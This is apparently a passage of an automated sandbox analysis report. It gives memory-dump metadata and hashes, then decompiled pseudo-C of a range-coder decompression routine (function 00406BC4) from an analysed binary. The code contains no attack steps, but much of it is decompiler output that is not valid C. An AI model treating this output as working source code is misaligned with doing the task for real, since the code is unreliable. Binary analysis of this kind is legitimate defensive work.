                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbd
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cc2
                                                0x00406cc5
                                                0x00406cc8
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406cce
                                                0x00406cd0
                                                0x00406cd0
                                                0x00000000
                                                0x00000000
                                                0x00406f12
                                                0x00406f12
                                                0x00406f12
                                                0x00406f16
                                                0x00000000
                                                0x00000000
                                                0x00406f1c
                                                0x00406f1f
                                                0x00406f22
                                                0x00406f25
                                                0x00406f27
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00406f2d
                                                0x00406f30
                                                0x00406f33
                                                0x00406f36
                                                0x00406f39
                                                0x00406f3a
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3f
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4f
                                                0x00406f51
                                                0x00406f54
                                                0x00000000
                                                0x00406f56
                                                0x00406cd3
                                                0x00406cd3
                                                0x00000000
                                                0x00406cd3
                                                0x00406f54
                                                0x00407189
                                                0x004071ab
                                                0x004071b1
                                                0x004071b3
                                                0x004071ba
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x004071c0
                                                0x004071c0
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                                • Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
                                                • Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                                                • Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406BC4, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406BC4() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
